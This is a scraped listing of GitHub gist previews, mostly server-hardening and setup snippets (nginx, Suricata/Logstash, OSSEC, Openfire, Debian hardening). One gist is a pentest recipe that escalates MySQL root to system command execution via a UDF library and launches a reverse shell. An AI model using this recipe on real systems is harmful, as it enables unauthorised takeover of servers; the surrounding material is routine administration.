This is a basic guide on hardening your Debian VPS. And Ubuntu users may also find this guide useful, since Ubuntu is based on Debian.
Don't panic!
Shahee Mirza shaheemirza
regit
/ logstash_suricata_eve.conf
Last active
December 19, 2018 13:05
A sample Logstash configuration for Suricata JSON output.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| input { | |
| file { | |
| path => [ "/usr/local/var/log/suricata/eve.json" ] | |
| codec => json | |
| } | |
| } | |
| filter { | |
| if [src_ip] { | |
| geoip { |
tollmanz
/ compile-nginx.sh
Last active
May 3, 2024 12:06
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Install dependencies | |
| # | |
| # * checkinstall: package the .deb | |
| # * libpcre3, libpcre3-dev: required for HTTP rewrite module | |
| # * zlib1g zlib1g-dbg zlib1g-dev: required for HTTP gzip module | |
| apt-get install checkinstall libpcre3 libpcre3-dev zlib1g zlib1g-dbg zlib1g-dev && \ | |
| mkdir -p ~/sources/ && \ | |
| # Compile against OpenSSL to enable NPN |
p0c
/ mysql_root_to_system_root
Last active
August 14, 2021 23:58
#pentest #recipe: mysql root -> system root (linux)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql | |
| # (currently not present in kali's sqlmap, only the windows one, the same for metasploit...) | |
| mysql> use mysql; | |
| mysql> create table test(line blob); | |
| mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so')); | |
| mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so'; | |
| mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; | |
| mysql> select sys_exec('./reverse_shell &'); |
I'm writing this up from memory, so errors may appear.
This has been updated to use SHA256 certificates.
- Go to http://www.startssl.com/
- Click on 'Control Panel'
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #PROLOGUE: all this should be run as root, otherwise stated | |
| #update && upgrade: | |
| apt-get update && apt-get upgrade -y | |
| #create a new user | |
| adduser user_x | |
| #create group admin (funny enough, it does not exist, although its accounted in the /etc/sudoers file): | |
| addgroup --system admin |
plentz
/ nginx.conf
Last active
October 22, 2025 16:10
Best nginx configuration for improved security(and performance)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # to generate your dhparam.pem file, run in the terminal | |
| openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048 |
itsderek23
/ mariadb-galera.markdown
Last active
May 16, 2016 11:01
The High Availability Switch: from MySQL+MMM to MariaDB+Galera Cluster
Few things feel worst than rolling out a High Availability (HA) system, then regularly seeing that system collapse. For our team at Rails Machine, this failing HA system was MySQL Multi-Master Replication Manager (MMM).
We've been searching for a MMM replacement for a while, and a few months ago, we made the switch to MariaDB + Galera Cluster for High Availability MySQL. What's wrong with MySQL MMM? What's special about Galera Cluster? Read on!
daviddyball
/ ossec.sls
Last active
December 12, 2015 09:49
Trying to get a one-time state for installing OSSEC. It only needs to run once... but the logic I've implemented doesn't seem to be working as planned. Any pointers?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| % set version = '2.6' -%} | |
| {% set ossecdir = 'ossec-hids-{0}'.format(version) -%} | |
| ossec-install-working-dir: | |
| file.directory: | |
| - name: /tmp/ossec-install | |
| ossec-download-installer: | |
| file.managed: | |
| - source: salt://ossec/files/{{ ossecdir }}.tar.gz |
huberflores
/ openfire.as
Last active
May 22, 2016 05:35
Installation and Configuration of Openfire 3.7.1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * author Huber Flores | |
| */ | |
| # Openfire guide for Ubuntu 12.04 - 64 bits | |
| # Dowload Openfire tar.gz version (openfire_3_7_1.tar.gz) (http://www.igniterealtime.org/downloads/index.jsp) | |
| # Dowload Oracle JDK 6 SE and install | |
| $ sudo aptitude update |